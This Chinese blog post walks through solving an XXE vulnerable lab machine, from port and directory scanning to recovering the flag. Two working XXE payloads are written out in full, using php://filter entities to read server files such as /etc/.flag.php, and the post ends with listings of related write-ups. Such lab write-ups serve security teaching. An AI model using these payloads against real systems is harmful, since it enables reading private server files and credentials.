xxe-靶机通关攻略

已于 2025-03-10 19:56:01 修改
阅读量520 收藏 11
点赞数 15
CC 4.0 BY-SA版权
文章标签: linux 运维 服务器
于 2025-03-10 19:49:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_85578339/article/details/146160526

1.安装靶机,将ova打开,运用kali查询开放端口及ip

2.靶机ip为192.168.126.147,用浏览器打开

3.运用kali  dirb命令扫描ip下的信息

4.依据经验可得,访问robots.txt

5.分别访问两个目录

6.随机输入账号密码,运用bp进行抓包,发送到repeater进行下一步操作

7.发现 name 位置为回显位,构造xxe攻击

8.将图片内容进行base解码

依次尝试base32   base64

9.查看解码内容,看到username跟password的值

10.将密码进行解密

MD5解密

11.访问 http://192.168.168.147/xxe/admin.php

运用账号密码登录

12.点击flag,获得一个新的php文档

13.访问该文档

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flagmeout.php" > ]>
 
<root>
  <name>
    &xxe;
  </name>
  <password>
    1
  </password>
</root>

14.进行base-64解码

15.查看解码内容可以看到flag,进行解码

base64解码失败,进行base32解码

再次进行base64解码

16.查看到新的文件flag.php,进行查看

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/.flag.php" > ]>
 
<root>
  <name>
    &xxe;
  </name>
  <password>
    696
  </password>
</root>

17.新建一个1.php文件,将内容放在其中进行访问

ksk852
关注
靶机实战bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用
代码讲故事
02-04 634
靶机实战bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用。
XXE靶机 通关攻略
qq_64470109的博客
03-10 494
刚刚告诉我们flag在这里,但是进来之后却给我们报404错误,那肯定是在这里的,只要我们细心观察就可以看到一个新的文件,我们去查看一下。解出来的东西我们不认识,但是我们知道他是php代码,所以我们自己新建一个php文件,把代码写进去,然后访问自己的php文件看一下。抓到了登录页面的包,简单分析一下这个包的格式,我们可以清楚的看到下面的格式是xml漏洞格式,所以我们将在这里进行漏洞利用。其次,构造xml,刚刚我们有个admin.php文件没访问到东西,现在我们指定admin目录去看一下,应该可以发现什么。
XXE靶机渗透
zzgslh的博客
04-12 990
靶机描述 XXE靶机,目标获取flag。 (下载链接:https://download.vulnhub.com/xxe/XXE.zip)。 渗透测试过程 端口扫描 使用nmap扫描发现开放80,5355端口。 访问web服务 1.首先访问80端口,页面是Ubuntu的默认页面。 2.使用御剑扫描web目录,发现存在robots.txt目录。 3.访问robots.txt目录...
XXE靶机详解
like_niustyle的博客
09-14 735
常规思路:先扫描端口,扫描目录 这里有点迷惑了,我用nessus扫了一遍扫出来两个开放端口:80和5335,。但是用nmap只扫描出来了一个80 端口 不知道是什么原因,有懂的大佬可以解释一下 不管了,根据后面的结果来看端口多一个少一个完全不影响 照例访问80: 没啥用,apache默认页面 端口5335访问不了 接下来扫目录,御剑和dirb都可以,看用什么系统了 index.html依然是apache的默认界面 robots.txt: xxe是目录,admin.php是页面 xxe: xx
XXE-labs靶场通关攻略
2401_82451607的博客
08-29 1042
XXE靶场通关攻略
XXE靶机 通关攻略--获取flag
qq_65379983的博客
03-10 1161
XXE靶机攻略
xxe靶机通关攻略
m0_63944205的博客
07-25 316
保存到我们的网站根目录下访问,这里注意PHP版本不能过告否则解不出来.激动吧.但是我们发现真正的flag其实是在etc/flag.php。然后我们可以去之前找见的两个目录里访问,这里没报错说明文件存在。下图可知网站有xxe/和/admin.php两个目录。这里我们得到用户名跟密码,将密码进行md5解码。我们返回/xxe目录再次进行抓包,并作如下修改。再输入数据进行抓包,并对数据包进行修改。然后我们将解码后的内容保存为php。我们发现了flag,激动吧.我们访问admin.php。我们发现找不见这个文件,
XXE实战项目--虚拟机部署XXE靶机通关攻略
qq_54694921的博客
12-19 349
XXE靶机通关攻略详解教程
XXE-labs靶场 XXE 靶机(通关攻略)
m0_68706634的博客
12-18 711
随便输入一个账号密码登录 并用bp进行抓包右击发送到重放器(Reperter)通过php协议base64加密读写flag将得到的编码进行base64解密得到flag。
【XEE实战项目】虚拟机部署-XXE靶机通关详解
m0_59151303的博客
07-25 1038
可以看到the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5),这串代码也是进行了加密,我们再进行解密,他的加密方式是base32 (一般MD5加密是32位,base64加密末尾都有等于号,没有等于号的可能是base32加密,严格意义上说是编码),将其解码看一下。解码以后,我们发现看不懂,但是我们知道他是php文件,可能是php代码,新建一个php文件,将代码写进去,访问一下。解码之后,我们可以发现有账号密码,但是密码用MD5进行了加密,解密一下。得到flag,完美!
(vulhub靶机通关XXE LAB: 1
yang1234567898的博客
01-16 2919
靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip 信息收集: 主机IP:192.168.43.48 开放了80端口 目录扫描:发现robots.txt 查看robots.txt,发现admin.php,还有一个xxe目录 直接访问admin.php报404,应该是不在根目录 扫描192.168.43.48/xxe目录,发现admin.php 访问xxe,是一个登录页面,应该就是admin.php 尝试弱口令和注入无果...
linux-系统日志查看指令systemctl
guchuanhang的专栏
08-05 319
本文介绍了Linux系统管理中的三个重要工具:systemctl用于管理系统服务,包括启动/停止服务和设置开机自启;journalctl用于查看systemd日志,支持按服务筛选和实时跟踪;以及基本日志查看和端口占用检查方法。文中还讲解了.service文件的存放位置差异,提供了常用命令参考和实用技巧,如查看Nginx进程启动时间、日志关键字搜索等。这些工具和技巧能有效帮助管理员进行日常系统维护和故障排查。
linux2.6 和 unix-v6 源码实验
is0815的博客
08-03 1030
你可以通过实现 Linux 2.6.x 的源码级图形调试,能看到源码、变量、寄存器,非常适合研究内核启动过程。同理,可以编译 unix-v6 (https://github.com/mit-pdos/xv6-public.git)以下是使用xv6‑public(xv6 的 x86 版本)在 Ubuntu/Linux 上安装、编译、运行、调试的详细中文指南。如果你想使用 RISC‑V 版本(xv6‑riscv),后续内容里也有说明。面向 Intel x86 架构,使用 ELF 格式。
14.Linux : nfs与autofs的使用
最新发布
xie52的博客
08-05 411
【代码】14.Linux : nfs与autofs的使用。
Linux-进程优先级
m0_73936730的博客
08-04 703
简单的说优先级和权限的区别: 老规矩:先写个简单的进程代码: 进程优先级的修正数据,nice 值,nice其取值范围是-20至19,一共40个级别。新的优先级 = 优先级(默认80) + nice,这样,当nice值为负值的时候,那么该程序将会优先级值将变小,即其优先级会变高,则其越快被执行,所以调整进程优先级,在Linux下,就是调整进程nice值。再次修改nice值会失败,进程优先级不能经常修改我们 语法格式: 示例: 语法格式: 示例:
Linux 设备驱动程序(3)- 字符驱动(1)
qq_49477505的博客
08-02 1333
本文介绍了Linux字符设备驱动的开发流程,重点讲解了设备编号管理、核心数据结构及注册方法。字符设备驱动用于管理以字节流方式读写的设备,如串口、键盘等。开发时需处理主次设备号分配、file_operations结构定义、file/inode结构使用等关键环节。文章详细说明了静态/动态分配设备号的方法,以及通过cdev结构注册驱动的步骤(初始化、添加、创建节点等)。最后强调驱动卸载时要反向释放资源,包括删除设备文件、注销cdev结构等。整个流程体现了字符设备驱动如何在内核中建立设备编号与操作方法的关联机制。
Linux9 root密码修改
xy021111的博客
08-01 267
linux行即quiet后面输入rd.break ctrl+x进入内核。
XML Schema编辑器xxe-perso-4_9_1版本发布
### XML Schema 编辑工具 XXE-Perso 4.9.1 知识点 #### 1. XML Schema 定义 XML Schema 是用来定义XML文档结构和内容模式的语言,它比DTD(文档类型定义)更为强大和灵活。XML Schema 详细规定了XML文档的元素、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值